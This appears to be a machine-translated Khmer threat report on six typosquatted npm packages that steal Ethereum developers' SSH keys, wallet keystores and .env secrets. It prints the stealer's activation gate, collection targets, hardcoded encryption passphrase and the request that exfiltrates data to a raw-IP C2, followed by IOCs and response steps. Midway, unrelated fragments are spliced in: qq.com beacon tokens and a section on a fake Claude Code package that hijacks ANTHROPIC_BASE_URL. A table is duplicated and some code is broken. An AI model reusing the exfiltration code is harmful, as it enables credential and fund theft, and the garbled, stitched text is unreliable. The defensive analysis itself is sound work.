ការវាយប្រហារ EVMDeFi npm Typosquatting លួចយកសោអ្នកអភិវឌ្ឍន៍

ការវាយប្រហារ EVM/DeFi npm Typosquatting លួចយកសោអ្នកអភិវឌ្ឍន៍

​មាតិកា

ប្រកាសដែលត្រូវតែអាន

ប្រកាសថ្មីៗបំផុតដែលគួរឱ្យចាប់អារម្មណ៍

TL; កុង

នៅថ្ងៃទី 6 ខែឧសភា ឆ្នាំ 2026 អ្នកបោះពុម្ពផ្សាយ npm តែមួយ namikazesarada010206បានរុញកញ្ចប់ព្យាបាទចំនួនប្រាំមួយដែលកំណត់គោលដៅប្រព័ន្ធអេកូឡូស៊ីអ្នកអភិវឌ្ឍន៍ Ethereum, Solidity និង DeFi។

កញ្ចប់នានា, viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utilsនិង web3-utils-coreបានប្រើឈ្មោះដែលអាចទុកចិត្តបានដែលត្រូវបានរចនាឡើងដើម្បីមើលទៅដូចជាបណ្ណាល័យជំនួយសម្រាប់ឧបករណ៍ Web3 ដ៏ពេញនិយម។

កញ្ចប់ទាំងប្រាំមួយមានផ្ទុកដូចគ្នា telemetry.js ឯកសារ។ ឯកសារនេះមានទំហំដូចគ្នាបេះបិទនៅទូទាំងចង្កោម ជាមួយ SHA-256៖

SHA-256 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1

មេរោគ​មិន​ដំណើរការ​នៅពេល​ដំឡើង​ទេ។ preinstall or postinstall ទំពក់។ ផ្ទុយទៅវិញ វាធ្វើឱ្យសកម្មនៅពេលដែលកញ្ចប់ត្រូវបាននាំចូលតាមរយៈ require().

ព័ត៌មានលម្អិតនោះសំខាន់ណាស់។

ការ​ដាក់​បញ្ចូល​នេះ​រង់ចាំ​រហូត​ដល់​អ្នក​អភិវឌ្ឍន៍​ពិតជា​ប្រើប្រាស់​កញ្ចប់​នេះ។ បន្ទាប់​មក​វា​ពិនិត្យ​មើល​ថា​តើ​ស្ថានីយ​ការងារ​មើល​ទៅ​ដូច​ជា​បរិស្ថាន​អភិវឌ្ឍន៍ Ethereum / Solidity ពិត​ប្រាកដ​ឬ​អត់។ វា​ស្វែងរក​កូនសោ Alchemy ឬ Infura កូនសោ​ឯកជន mnemonic កូនសោ​ដាក់​ពង្រាយ ឬ​ថត Foundry ក្នុងស្រុក។

ប្រសិនបើម៉ាស៊ីនមេត្រូវគ្នា អ្នកលួចនឹងប្រមូលកូនសោឯកជន SSH ឃ្លាំងកូនសោកាបូប Foundry / Geth / Brownie .env* ឯកសារ និងអថេរបរិស្ថានរសើប។ វាអ៊ិនគ្រីបបាច់ជាមួយ AES-256-GCM ដោយប្រើឃ្លាសម្ងាត់ដែលបានអ៊ិនកូដរឹង ហើយច្រោះវាទៅចំណុចបញ្ចប់ IPv4 C2 ឆៅ ជាមួយនឹងការផ្ទៀងផ្ទាត់ TLS ដែលបានបិទ។

ប្រព័ន្ធព្រមានមុនមេរោគ (MEW) របស់ Xygeni បានបញ្ជាក់ថាកញ្ចប់ទាំងប្រាំមួយជាមេរោគព្យាបាទ។ កញ្ចប់របាយការណ៍ដកចេញការចុះឈ្មោះ npm កំពុងរង់ចាំ។

ចង្កោម៖ កញ្ចប់ចំនួនប្រាំមួយ អ្នកបោះពុម្ពផ្សាយម្នាក់

គណនីអ្នកបោះពុម្ពផ្សាយ namikazesarada010206 ត្រូវបានភ្ជាប់ទៅអាសយដ្ឋាន Gmail ដែលមិនទាន់បានផ្ទៀងផ្ទាត់ namikazesarada010206@gmail.com.

យុទ្ធនាការនេះបានបង្ហាញខ្លួនជាការបោះពុម្ពផ្សាយមួយថ្ងៃនៅថ្ងៃទី 6 ខែឧសភា ឆ្នាំ 2026។ កញ្ចប់ទាំងប្រាំមួយត្រូវបានដាក់កំណែជា 1.0.0មានការពឹងផ្អែកពេលដំណើរការសូន្យ ហើយបានដឹកជញ្ជូនតែឯកសារបីប៉ុណ្ណោះ៖

package.json index.js telemetry.js

ពួកគេក៏បានប្រកាសពីឃ្លាំងប្រភពដូចគ្នាផងដែរ៖

https://github.com/harunosakura030303-maker/evmchain-config

កញ្ចប់បីដំបូងត្រូវបានចាប់បានដោយម៉ាស៊ីនស្កេន MEW នៅពេលបោះពុម្ពផ្សាយលើកដំបូង។ កញ្ចប់បីដែលនៅសល់ត្រូវបានបង្ខំឱ្យដាក់ទង់បន្ទាប់ពីការពិនិត្យឡើងវិញរបស់អ្នកវិភាគលើទម្រង់ npm របស់អ្នកបោះពុម្ពផ្សាយ។ នៅពេលដែល byte-identical ដូចគ្នា telemetry.js ត្រូវបានបញ្ជាក់នៅទូទាំងចង្កោម ពួកគេត្រូវបានបិទថាជាការព្យាបាទដោយភាពស៊ីសង្វាក់គ្នា។

កញ្ចប់សមាជិក កំណែ បានបោះពុម្ពផ្សាយ npm សំបុត្រ MEW លទ្ធភាព
viem-core 1.0.0 2026-05-06 01:38:44Z #51049 ព្យាបាទ
viem-utils-core 1.0.0 2026-05-06 #51050 ព្យាបាទ
ឧបករណ៍ប្រើប្រាស់ស្នូលរឹង 1.0.0 2026-05-06 #51051 ព្យាបាទ
evm-utils 1.0.0 2026-05-06 #51069 ព្យាបាទ ដោយភាពស៊ីសង្វាក់គ្នា
ឧបករណ៍ប្រើប្រាស់សម្រាប់រោងស្មិត 1.0.0 2026-05-06 #51071 ព្យាបាទ ដោយភាពស៊ីសង្វាក់គ្នា
web3-utils-core 1.0.0 2026-05-06 #51070 ព្យាបាទ ដោយភាពស៊ីសង្វាក់គ្នា

យុទ្ធសាស្ត្រដាក់ឈ្មោះគឺសាមញ្ញ ប៉ុន្តែមានប្រសិទ្ធភាព។

កញ្ចប់ទាំងនេះមិនក្លែងបន្លំឈ្មោះខាងលើពិតប្រាកដទេ។ ផ្ទុយទៅវិញ ពួកវាប្រើបច្ច័យ "ប្រយោជន៍" ដែលអាចទុកចិត្តបានដូចជា -core, -utilsនិង -utils-coreនោះធ្វើឱ្យពួកវាមើលទៅដូចជាបណ្ណាល័យដៃគូដែលអ្នកអភិវឌ្ឍន៍អាចរំពឹងថានឹងឃើញនៅជិតឧបករណ៍ Web3។

កញ្ចប់ព្យាបាទ គោលដៅស្របច្បាប់
viem-core viem ដែលជាកម្មវិធី Ethereum TypeScript ដ៏ពេញនិយមមួយ
viem-utils-core វីម
ឧបករណ៍ប្រើប្រាស់ស្នូលរឹង hardhat ដែលជាបរិយាកាសអភិវឌ្ឍន៍ Solidity ដ៏សំខាន់មួយ
evm-utils ឈ្មោះ​ឧបករណ៍ EVM ទូទៅ
ឧបករណ៍ប្រើប្រាស់សម្រាប់រោងស្មិត រោង​ស្មូន ជា​ខ្សែ​សង្វាក់​ឧបករណ៍ Solidity
web3-utils-core web3-utils, ជំនួយការ Web3.js

នេះគឺជាគំរូ "កញ្ចប់បន្ថែម"៖ មិនមែន "ខ្ញុំជាកញ្ចប់ពិតប្រាកដ" ទេ ប៉ុន្តែ "ខ្ញុំមើលទៅដូចជាជំនួយការសមហេតុផលនៅជុំវិញកញ្ចប់ពិតប្រាកដ"។

សម្រាប់អ្នកអភិវឌ្ឍន៍ DeFi ដែលមានចលនាយ៉ាងឆាប់រហ័ស នោះគ្រប់គ្រាន់ដើម្បីបង្កើតហានិភ័យ។

តើមានអ្វីកើតឡើងនៅពេលដែលកញ្ចប់ត្រូវបាននាំចូល

ខ្សែសង្វាក់វាយប្រហារមានទំហំតូច មានចេតនា និងផ្តោតលើបរិយាកាសអភិវឌ្ឍន៍គ្រីបតូ។

មិនមានទំពក់ដំឡើងទេ។ ផ្ទុយទៅវិញ កញ្ចប់នីមួយៗរួមបញ្ចូល index.js ដែលនាំចេញមុខងារ stub ហើយបន្ទាប់មកផ្ទុកម៉ូឌុល telemetry ព្យាបាទ។

require('./telemetry').init();

នេះមានន័យថា មេរោគនឹងធ្វើឱ្យសកម្មនៅពេលនាំចូលលើកដំបូង។

នោះមានប្រយោជន៍សម្រាប់ប្រតិបត្តិការសម្រាប់អ្នកវាយប្រហារ។ ម៉ាស៊ីនស្កេន និងប្រអប់ខ្សាច់ជាច្រើនផ្តោតលើឥរិយាបថពេលដំឡើង។ កញ្ចប់នេះរង់ចាំរហូតដល់វាត្រូវបានប្រើប្រាស់ដោយអ្នកអភិវឌ្ឍន៍ ស្គ្រីបសាងសង់ ឈុតសាកល្បង ឬផ្លូវពេលដំណើរការ។

ច្រកទ្វារធ្វើឱ្យសកម្ម៖ បើកដំណើរការតែលើស្ថានីយការងារអ្នកអភិវឌ្ឍន៍ Web3 ពិតប្រាកដប៉ុណ្ណោះ

ផ្នែកសំខាន់បំផុតនៃការផ្សាំគឺច្រកទ្វារធ្វើឱ្យសកម្ម។

មេរោគ​នេះ​ពិនិត្យ​មើល​អថេរ​បរិស្ថាន​ដែល​មាន​ជា​ទូទៅ​នៅ​លើ​ម៉ាស៊ីន​អភិវឌ្ឍន៍ Ethereum / Solidity៖

const indicators = [   process.env.ALCHEMY_API_KEY,   process.env.INFURA_KEY,   process.env.PRIVATE_KEY,   process.env.MNEMONIC,   process.env.DEPLOYER_KEY, ].filter(Boolean);

វាក៏ពិនិត្យមើលថាតើ Foundry ហាក់ដូចជាត្រូវបានដំឡើងដែរឬទេ៖

fs.existsSync(path.join(os.homedir(), '.foundry'))

ប្រសិនបើលក្ខខណ្ឌទាំងពីរមិនពិតទេ អនុគមន៍នឹងត្រឡប់ ហើយមិនធ្វើអ្វីទាំងអស់។

នោះធ្វើឱ្យកញ្ចប់មានភាពស្ងប់ស្ងាត់ជាងមុននៅក្នុងបរិយាកាសវិភាគទូទៅ។ ប្រអប់ខ្សាច់ដែលគ្មាន Foundry, Alchemy keys, Infura, private keys ឬ mnemonics អាចមើលឃើញការនាំចូលដែលមើលទៅមិនបង្កគ្រោះថ្នាក់។

នៅលើម៉ាស៊ីនមេដែលត្រូវគ្នា មេរោគនឹងរង់ចាំពី 60 ទៅ 90 វិនាទីមុនពេលប្រមូល៖

setTimeout(() => { try { _collect(); } catch {} },           60000 + Math.random() * 30000).unref();

ការពន្យារពេលកាត់បន្ថយទំនាក់ទំនងជាក់ស្តែងរវាងការនាំចូល និងការច្រោះចេញ។ .unref() ការហៅ​ក៏អនុញ្ញាតឱ្យដំណើរការម៉ាស៊ីនចាកចេញជាធម្មតា ប្រសិនបើកញ្ចប់ត្រូវបាននាំចូលក្នុងស្គ្រីបដែលមានអាយុកាលខ្លី។

នេះមិនមែនជាឥរិយាបថវាយបំបែកហើយចាប់យកដោយសំឡេងរំខាននោះទេ។ វាគឺជាកម្មវិធីលួចគោលដៅដែលត្រូវបានរចនាឡើងដើម្បីជៀសវាងការដំណើរការ លុះត្រាតែបរិយាកាសអ្នកអភិវឌ្ឍន៍មានតម្លៃក្នុងការលួចពីវា។

អ្វីដែលចោរប្រមូលបាន

នៅពេលដែលច្រកទ្វារធ្វើឱ្យសកម្មឆ្លងកាត់ មេរោគនឹងប្រមូលពីប្រភពដែលសំខាន់បំផុតនៅក្នុងការអភិវឌ្ឍន៍ Web3៖ កូនសោឯកជន ឃ្លាំងកូនសោកាបូប លិខិតសម្គាល់ការដាក់ពង្រាយ អាថ៌កំបាំងពពក ថូខឹន npm និងការកំណត់រចនាសម្ព័ន្ធគម្រោងក្នុងស្រុក។

ប្រភព អ្វីដែលត្រូវបានប្រមូល
process.env អថេរណាមួយដែលត្រូវគ្នា /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i
~/.ssh/* ឯកសារដែលមាន PRIVATE KEY ឬ BEGIN OPENSSH រួមទាំងខ្លឹមសារឯកសារពេញលេញ
~/.foundry/keystores/* ឯកសារ​ឃ្លាំង​សោ​កាបូប Foundry
~/.ethereum/keystore/* ឯកសារឃ្លាំងសម្ងាត់កាបូប Geth
~/.brownie/accounts/* ឯកសារ​ឃ្លាំង​សោ​កាបូប Brownie
${cwd}/.env ខ្លឹមសារឯកសារពេញលេញ
${cwd}/.env.local ខ្លឹមសារឯកសារពេញលេញ
${cwd}/.env.production ខ្លឹមសារឯកសារពេញលេញ
${cwd}/.env.development ខ្លឹមសារឯកសារពេញលេញ
ឈ្មោះម៉ាស៊ីន os.() ទិន្នន័យមេតារបស់ម៉ាស៊ីន
crypto.randomUUID() ឧបករណ៍កំណត់អត្តសញ្ញាណជនរងគ្រោះ/វគ្គ
Date.now() ត្រាពេលវេលាប្រមូល
otheve.beacon.qq.com oth.str.beacon.qq.com h.trace.qq.com

ថូខឹន ATTA មានដូចខាងក្រោម៖

ATTA_ID 00400014144 ATTA_TOKEN 6478159937

យើងមិនទាន់អាចបញ្ជាក់បានថាតើទូរមាត្រនេះជាការវិភាគផ្ទាល់ខ្លួនរបស់ប្រតិបត្តិករ ឬជាឆានែលរកប្រាក់ដោយឡែកពីគ្នានោះទេ។ ថូខឹន ATTA គឺដូចគ្នានៅក្នុងគំរូទាំងពីរដែលយើងបានពិនិត្យ។

ចង្កោម B៖ ហៃបៃ

claude.hk ការបន្លំ OAuth + ការលួចចូល ANTHROPIC_BASE_URL

គំរូថ្ងៃទី 1 ខែមេសា គឺជាដៃដំបូងដ៏ឆៅបំផុតនៃយុទ្ធនាការនេះ។

heibai:2.1.88-claude.hk-4 ត្រូវបានបោះពុម្ពផ្សាយដោយ wuguoqiangvip28គណនីមួយដែលបង្កើតឡើងនៅថ្ងៃទី 7 ខែមិថុនា ឆ្នាំ 2025។ កញ្ចប់នេះបានបង្ហាញយ៉ាងច្បាស់អំពីកំណែខ្លួនវាប្រឆាំងនឹងច្បាប់ស្របច្បាប់ 2.1.88 ការដោះលែងមនុស្សធម៌។

វាមិនមានបញ្ហាជាមួយ CA-cert MITM ទេ។ ផ្ទុយទៅវិញ វាកុហកអ្នកប្រើប្រាស់អំពីចំណុចបញ្ចប់ OAuth។

ការបន្ថែមមេរោគព្យាបាទបន្ថែមពីលើប្រភព Claude Code ដែលលេចធ្លាយរួមមាន៖

ប្រភព អ្វីដែលត្រូវបានប្រមូល
process.env អថេរណាមួយដែលត្រូវគ្នា /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i
~/.ssh/* ឯកសារដែលមាន PRIVATE KEY ឬ BEGIN OPENSSH រួមទាំងខ្លឹមសារឯកសារពេញលេញ
~/.foundry/keystores/* ឯកសារ​ឃ្លាំង​សោ​កាបូប Foundry
~/.ethereum/keystore/* ឯកសារឃ្លាំងសម្ងាត់កាបូប Geth
~/.brownie/accounts/* ឯកសារ​ឃ្លាំង​សោ​កាបូប Brownie
${cwd}/.env ខ្លឹមសារឯកសារពេញលេញ
${cwd}/.env.local ខ្លឹមសារឯកសារពេញលេញ
${cwd}/.env.production ខ្លឹមសារឯកសារពេញលេញ
${cwd}/.env.development ខ្លឹមសារឯកសារពេញលេញ
ឈ្មោះម៉ាស៊ីន os.() ទិន្នន័យមេតារបស់ម៉ាស៊ីន
crypto.randomUUID() ឧបករណ៍កំណត់អត្តសញ្ញាណជនរងគ្រោះ/វគ្គ
Date.now() ត្រាពេលវេលាប្រមូល

បញ្ជីគោលដៅគឺជាក់លាក់ណាស់។ នេះមិនមែនជាការលួចកម្មវិធីរុករកទូទៅ ឬការលួចយកព័ត៌មានសម្ងាត់ទូលំទូលាយនោះទេ។ វាមានគោលបំណងសម្រាប់អ្នកអភិវឌ្ឍន៍ដែលបង្កើត សាកល្បង ដាក់ពង្រាយ ឬដំណើរការកម្មវិធី Ethereum។

ការដាក់បញ្ចូលឃ្លាំងសម្ងាត់ Foundry, Geth និង Brownie គឺមានសារៈសំខាន់ជាពិសេស។ ឯកសារទាំងនេះអាចតំណាងឱ្យការចូលប្រើកាបូប ឬអត្តសញ្ញាណដាក់ពង្រាយដោយផ្ទាល់។ ប្រសិនបើអ្នកវាយប្រហារអាចភ្ជាប់ពួកវាជាមួយពាក្យសម្ងាត់ ម៉ូនីក ឬអាថ៌កំបាំងបរិស្ថាន ពួកគេអាចផ្លាស់ទីមូលនិធិ ធ្វើត្រាប់តាមអ្នកដាក់ពង្រាយ ឬសម្របសម្រួលប្រតិបត្តិការកិច្ចសន្យាឆ្លាតវៃ។

ការអ៊ិនគ្រីបមុនពេលច្រោះចេញ

មេរោគ​នេះ​អ៊ិនគ្រីប​ទិន្នន័យ​ដែល​ប្រមូល​បាន​មុន​ពេល​ផ្ញើ​វា​ចេញ។

const key = crypto.createHash('sha256').update(K).digest(); const iv = crypto.randomBytes(12); const cipher = crypto.createCipheriv('aes-256-gcm', key, iv);

ឃ្លាសម្ងាត់ដែលបានអ៊ិនកូដរឹងគឺ៖

a]3Fk9$mP2xL7vQ8nR4wJ6yB0tH5cE1d

payload ចុងក្រោយត្រូវបានរុំជា JSON៖

{"v":2,"iv":"<base64>","d":"<base64-ciphertext>","t":"<base64-gcm-tag>"}

ការអ៊ិនគ្រីបមិនធ្វើឱ្យមេរោគកាន់តែជឿនលឿនដោយខ្លួនឯងទេ។ ទោះជាយ៉ាងណាក៏ដោយ វាធ្វើឱ្យការត្រួតពិនិត្យបណ្តាញកាន់តែពិបាក។ អ្នកការពារដែលមើលការចាកចេញនឹងឃើញ payload JSON ប៉ុន្តែមិនមែនកូនសោរ ឯកសារកាបូបលុយ ឬ .env មាតិកាដោយគ្មានឃ្លាសម្ងាត់ដែលបានអ៊ិនកូដ និងតក្កវិជ្ជាឌិគ្រីប។

ការច្រោះទៅជា Raw IPv4 C2

ផ្លូវច្រោះត្រូវបានអ៊ិនកូដរឹង៖

const req = https.request({   hostname: '76.13.37.80', port: 8443,   path: '/api/v1/telemetry', method: 'POST',   headers: { 'Content-Type': 'application/json', ... },   rejectUnauthorized: false, timeout: 8000, }, () => {});

មេរោគ​ផ្ញើ​ទិន្នន័យ​ទៅ៖

https://76.13.37.80:8443/api/v1/telemetry

ព័ត៌មានលម្អិតពីរលេចធ្លោ។

ទីមួយ C2 គឺជាអាសយដ្ឋាន IPv4 ឆៅជាជាងដែន។ វាលុបបំបាត់តម្រូវការសម្រាប់ការចុះឈ្មោះដែន និងជៀសវាងការរកឃើញមួយចំនួនដែលមានមូលដ្ឋានលើដែន។

ទីពីរ ការផ្ទៀងផ្ទាត់ TLS ត្រូវបានបិទជាមួយ៖

rejectUnauthorized: false

វាអនុញ្ញាតឱ្យមេរោគទទួលយកវិញ្ញាបនបត្រណាមួយ រួមទាំងវិញ្ញាបនបត្រដែលចុះហត្ថលេខាដោយខ្លួនឯង។ ម្យ៉ាងវិញទៀត អ្នកវាយប្រហារទទួលបានការដឹកជញ្ជូនដែលបានអ៊ិនគ្រីបដោយមិនចាំបាច់មានវិញ្ញាបនបត្រសាធារណៈដែលមានសុពលភាព។

គ្មានតក្កវិជ្ជានៃការព្យាយាមឡើងវិញ និងគ្មានម៉ាស៊ីនបម្រុងទុកទេ។ កំហុសត្រូវបានលេបចូលដោយស្ងៀមស្ងាត់។ វារក្សាកញ្ចប់ឱ្យស្ងាត់ ប្រសិនបើ C2 ស្ថិតនៅក្រៅបណ្តាញ ឬមិនអាចទាក់ទងបាន។

ហេតុអ្វីបានជាយុទ្ធនាការនេះសំខាន់

កញ្ចប់ npm ដែលមានគំនិតអាក្រក់ភាគច្រើនមានគោលបំណងអ្នកអភិវឌ្ឍន៍ដេញតាមព័ត៌មានសម្ងាត់ទូលំទូលាយ៖ ថូខឹន npm, កូនសោ AWS, ថូខឹន GitHub ឬ .npmrc ឯកសារ។

យុទ្ធនាការនេះធ្វើឱ្យគោលដៅរួមតូច។

វាស្វែងរកសញ្ញាដែលបង្ហាញថាម៉ាស៊ីននេះជាកម្មសិទ្ធិរបស់អ្នកអភិវឌ្ឍន៍ Ethereum ឬ Solidity។ បន្ទាប់មកវាទាញយកទ្រព្យសកម្មដែលសំខាន់នៅក្នុងបរិយាកាសនោះ៖ ឃ្លាំងសោកាបូប, កូនសោឯកជន, ម៉ូនីកូទិក, កូនសោដាក់ពង្រាយ, .env ឯកសារ និងកូនសោ SSH។

នោះធ្វើឱ្យយុទ្ធនាការនេះមានគ្រោះថ្នាក់ជាងសម្រាប់ក្រុម Web3 ជាងអ្នកលួច npm ទូទៅ។

ការឆ្លងមេរោគដោយជោគជ័យអាចបណ្តាលឱ្យ៖

  • កាបូបដាក់ពង្រាយ
  • សោអ្នកគ្រប់គ្រងកិច្ចសន្យាឆ្លាតវៃ
  • សោអ្នកផ្តល់សេវា RPC
  • លិខិតសម្គាល់ការដាក់ពង្រាយលើពពក
  • ថូខឹនបោះពុម្ពផ្សាយ npm
  • ការចូលប្រើ SSH ទៅកាន់អ្នកអភិវឌ្ឍន៍ ឬហេដ្ឋារចនាសម្ព័ន្ធសាងសង់
  • អាថ៌កំបាំងនៃគម្រោងត្រូវបានរក្សាទុកនៅក្នុង .env ឯកសារ
  • ឃ្លាំង​សោ​កាបូប​សម្រាប់ Foundry, Geth ឬ Brownie

ឈ្មោះកញ្ចប់ក៏បង្ហាញពីវិស្វកម្មសង្គមច្បាស់លាស់ផងដែរ។ ពួកវាកំណត់គោលដៅប្រព័ន្ធអេកូឡូស៊ីអ្នកអភិវឌ្ឍន៍ Web3 តាមរយៈឈ្មោះឧបករណ៍ដែលធ្លាប់ស្គាល់៖ viem, hardhat, foundry, evmនិង web3.

តារាសម្តែងមិនចាំបាច់សម្របសម្រួលគម្រោងពិតប្រាកដនោះទេ។ ពួកគេគ្រាន់តែត្រូវការអ្នកអភិវឌ្ឍន៍ដើម្បីដំឡើងអ្វីដែលមើលទៅដូចជាកញ្ចប់ដៃគូសមហេតុផលមួយ។

សូចនាករនៃការសម្របសម្រួល និងការរកឃើញ

កញ្ចប់ និងអ្នកបោះពុម្ពផ្សាយ
វាល តម្លៃ
អ្នកបោះពុម្ពផ្សាយ npm ណាមីកាហ្សេសារ៉ាដា០១០២០៦
អ៊ីមែលរបស់អ្នកបោះពុម្ពផ្សាយ namikazesarada010206@gmail.com
បានផ្ទៀងផ្ទាត់អ៊ីមែល ទេ
SCM បានផ្ទៀងផ្ទាត់ ទេ
ពិន្ទុកេរ្តិ៍ឈ្មោះ 1.0
កញ្ចប់ viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, web3-utils-core
កំណែ ទាំងអស់ 1.0.0
ឃ្លាំង​ប្រភព https://github.com/harunosakura030303-maker/evmchain-config
បានបញ្ជាក់ថាមានគំនិតអាក្រក់ កញ្ចប់ទាំងប្រាំមួយ
Network
វាយបញ្ចូល តម្លៃ
ចំណុចបញ្ចប់ C2 https://76.13.37.80:8443/api/v1/telemetry
C2 IP 76.13.37.80
ច្រក C2 8443/tcp
ឥរិយាបថ TLS បដិសេធគ្មានការអនុញ្ញាត៖ មិនពិត
គ្រោងការណ៍បន្ទុក {"v":២,"iv": ,"ឃ": "ធ": }
ឯកសារ និងហាស
វាយបញ្ចូល តម្លៃ
telemetry.js SHA-256 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1
ប្លង់កញ្ចប់ package.json, index.js, telemetry.js
ចំនួនឯកសារ 3
ទំហំសរុបប្រហាក់ប្រហែល 3.4 គីឡូបៃ

សញ្ញាធ្វើឱ្យសកម្ម

មេរោគ​ពិនិត្យ​រក​អថេរ​បរិស្ថាន​ទាំងនេះ៖

ALCHEMY_API_KEY INFURA_KEY PRIVATE_KEY MNEMONIC DEPLOYER_KEY

វាក៏ពិនិត្យមើលផងដែរចំពោះ៖

~/.foundry/

ផ្លូវម៉ាស៊ីនគោលដៅ

~/.ssh/* ~/.foundry/keystores/* ~/.ethereum/keystore/* ~/.brownie/accounts/* ${cwd}/.env ${cwd}/.env.local ${cwd}/.env.production ${cwd}/.env.development

ការប្រមូល Regex

/TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i

កំណត់ចំណាំរកឃើញ

ច្បាប់ជាច្រើនចាប់យុទ្ធនាការនេះដោយមិនចាំបាច់មានការវិភាគអាកប្បកិរិយាពេញលេញនោះទេ។

ដំបូង សូមស្កេនឯកសារចាក់សោសម្រាប់ឈ្មោះកញ្ចប់ព្យាបាទចំនួនប្រាំមួយ៖

viem-core viem-utils-core hardhat-core-utils evm-utils foundry-utils web3-utils-core

ការប្រកួតណាមួយនៅក្នុង package-lock.json, yarn.lock, pnpm-lock.yamlnode_modules ប្រវត្តិសាស្ត្រគួរតែត្រូវបានចាត់ទុកថាជាឧប្បត្តិហេតុធ្ងន់ធ្ងរ។

ទីពីរ តាមដានដំណើរការ Node.js ដែលអានផ្លូវ keystore របស់កាបូប៖

~/.foundry/keystores/ ~/.ethereum/keystore/ ~/.brownie/accounts/

នេះកម្រជាឥរិយាបថស្របច្បាប់សម្រាប់កញ្ចប់ដែលបាននាំចូលជាការពឹងផ្អែកជំនួយ។ វាគួរឱ្យសង្ស័យជាពិសេសនៅពេលដែលសកម្មភាពបណ្តាញចេញ។

ទីបី រារាំង ឬជូនដំណឹងលើការតភ្ជាប់ HTTPS ដើម្បី៖

76.13.37.80:8443

ជាពិសេសនៅពេលដែលផ្លូវស្នើសុំគឺ៖

/api/v1/telemetry

ទីបួន ស្វែងរកកញ្ចប់ npm ដែលរួមបញ្ចូលគ្នានូវលក្ខណៈទាំងនេះ៖

  • អ្នកបោះពុម្ពផ្សាយថ្មី ឬមានកេរ្តិ៍ឈ្មោះទាប
  • គណនី Gmail ដែលមិនទាន់បានផ្ទៀងផ្ទាត់
  • ឈ្មោះកញ្ចប់ដែលនៅជាប់នឹង Web3
  • គ្មានប្រវត្តិឃ្លាំងដែលមានអត្ថន័យទេ
  • ប្លង់កញ្ចប់តូច
  • index.js ដែលផ្ទុកឯកសារទូរមាត្រ ឬឯកសារជំនួយ
  • គ្មានការពឹងផ្អែកពេលដំណើរការ
  • ការប្រមូលអថេរបរិស្ថានងាយប្រតិកម្ម
  • ការចូលប្រើឃ្លាំងសោកាបូប

គំរូនេះមានប្រយោជន៍ជាង IOC តែមួយ ពីព្រោះកញ្ចប់បន្ទាប់អាចផ្លាស់ប្តូរអាសយដ្ឋាន IP ប៉ុន្តែរក្សាតក្កវិជ្ជាកំណត់គោលដៅដូចគ្នា។

បញ្ជីត្រួតពិនិត្យការឆ្លើយតបទៅនឹងការសម្របសម្រួល

ប្រសិនបើអ្នកអភិវឌ្ឍន៍ម្នាក់បានប្រើកញ្ចប់មួយក្នុងចំណោមកញ្ចប់ទាំងប្រាំមួយ ហើយបរិស្ថានរបស់ពួកគេត្រូវគ្នានឹងច្រកធ្វើឱ្យសកម្ម សូមចាត់ទុកស្ថានីយការងារថាមានការគំរាមកំហែង។

នោះរួមបញ្ចូលទាំងម៉ាស៊ីនដែលបានដំឡើង Foundry សោ Alchemy ឬ Infura នៅក្នុងបរិស្ថាន សោឯកជន ម៉ូណេម៉ិច ឬសោអ្នកដាក់ពង្រាយ។

ការឆ្លើយតបដែលបានណែនាំ៖

  • ផ្តាច់ម៉ាស៊ីនមេចេញពីបណ្តាញ។
  • អភិរក្ស។ node_modules, ឯកសារចាក់សោ ប្រវត្តិសែល និងកំណត់ហេតុពាក់ព័ន្ធសម្រាប់កោសល្យវិច្ច័យ។
  • បង្វិលគូសោ SSH នីមួយៗនៅក្រោម ~/.ssh/.
  • បង្វិលសោរកាបូបសម្រាប់ឃ្លាំងសោរនីមួយៗនៅក្រោម ~/.foundry, ~/.ethereumនិង ~/.brownie.
  • ផ្ទេរប្រាក់ទៅកាបូបថ្មី។
  • បង្វិលរាល់អាថ៌កំបាំងដែលរក្សាទុកក្នុង .env* ឯកសារនៅក្នុងឃ្លាំងដែលអ្នកអភិវឌ្ឍន៍ធ្វើការ។
  • បង្វិល​អាថ៌កំបាំង​បរិស្ថាន​ដែល​ត្រូវ​នឹង​សំណុំ​ទិន្នន័យ​ធម្មតា រួម​ទាំង​សោ AWS, ថូខឹន npm, ថូខឹន​ដាក់​ពង្រាយ, សោ API, សោឯកជន, គ្រាប់ពូជ និង​ម៉ូនីក។
  • សវនកម្មសកម្មភាព cloud, npm, GitHub, អ្នកផ្តល់សេវា RPC និង blockchain ចាប់តាំងពីកញ្ចប់ត្រូវបានដំឡើងជាលើកដំបូង។
  • កែសម្រួលរូបភាពស្ថានីយការងារឡើងវិញមុនពេលប្រើប្រាស់ឡើងវិញ។

អ្វីដែលអ្នកការពារគួរយក

យុទ្ធនាការនេះបង្ហាញពីរបៀបដែល npm typosquatting កំពុងវិវត្តនៅជុំវិញប្រព័ន្ធអេកូឡូស៊ីអ្នកអភិវឌ្ឍន៍ដែលមានតម្លៃខ្ពស់។

តារាសម្តែងមិនត្រូវការការតស៊ូទេ។ ពួកគេមិនត្រូវការការបិទបាំងទេ។ ពួកគេថែមទាំងមិនត្រូវការការប្រតិបត្តិពេលដំឡើងទៀតផង។

ផ្ទុយទៅវិញ ពួកគេពឹងផ្អែកលើរឿងបីយ៉ាង៖

  • ឈ្មោះកញ្ចប់ Web3 ដែលអាចទុកចិត្តបាន
  • ការធ្វើឱ្យសកម្មតែលើម៉ាស៊ីនអភិវឌ្ឍន៍គ្រីបតូពិតប្រាកដប៉ុណ្ណោះ
  • ការលួចឯកសារ និងអាថ៌កំបាំងដោយផ្ទាល់ដែលសំខាន់បំផុតសម្រាប់អ្នកអភិវឌ្ឍន៍ Ethereum

នោះធ្វើឱ្យយុទ្ធនាការនេះងាយនឹងមើលរំលងក្នុងការស្កេនទូលំទូលាយ និងមានគ្រោះថ្នាក់នៅពេលដែលវាធ្លាក់ចូលទៅក្នុងបរិយាកាសត្រឹមត្រូវ។

